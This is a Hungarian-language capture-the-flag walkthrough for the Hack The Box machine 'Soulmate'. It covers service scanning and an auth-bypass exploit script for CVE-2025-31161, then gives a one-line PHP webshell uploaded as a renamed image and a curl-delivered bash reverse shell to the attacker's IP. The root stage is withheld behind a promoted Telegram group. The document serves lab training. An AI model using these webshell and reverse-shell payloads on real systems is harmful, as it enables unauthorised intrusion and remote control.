Soulmate — Hack The Box
Platform: Linux
IP: 10.129.229.162
Nehézség: Easy
Szerző: NoSec
mélyebbre mennél? csatlakozz a backdoor crew-hoz és kapj exkluzív videókat & korai hozzáférést a root chainekhez.
💀 csatlakozz a backdoor crew-hoz/etc/hosts
szerkesztése
sudo sh -c '10.129.229.162 soulmate.htb ftp.soulmate.htb" >> /etc/hosts'
Recon – Szolgáltatás feltérképezés
Nmap
nmap -sVC soulmate.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Soulmate - Find Your Perfect Match
|_http-server-header: nginx/1.18.0 (Ubuntu)
Foothold – Web sebezhetőség → RCE
Új vhost lett felfedezve: ftp.soulmate.htb
Ez sebezhető volt a CVE-2025-31161 (auth bypass) hibára.
Létrehozhatunk egy új admin felhasználót:
python3 cve-2025-31161.py \
--target_host ftp.soulmate.htb \
--port 80 \
--target_user admin \
--new_user nosec \
--password 'Crush@123!'
Az admin panelen a feltöltött .png
fájlok átnevezhetők .php
-ra → klasszikus webshell feltöltés.
Webshell feltöltés
echo '<?php if(isset($_REQUEST["cmd"])) system($_REQUEST["cmd"]); ?>' > shell.png
Feltöltés → átnevezés → shell.php
.
Teszt:
http://soulmate.htb/assets/images/profiles/shell.php?cmd=id
Reverse shell
rlwrap nc -lvnp 9001
curl "http://soulmate.htb/assets/images/profiles/shell.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/10.10.14.81/9001%200%3E%261'"
✅ Megvan a www-data
shell.
🔐 A root rész csak a privát Telegram csoportban érhető el, amíg a gép aktív.
👉 Csatlakozz a teljes writeupért, extra tippekért és belsős tartalmakért:
📡 https://t.me/nosecpwn
☕ hívj meg egy kávéra, hogy ne aludjak el a következő writeup írása közben
💻 támogasd a nosec-et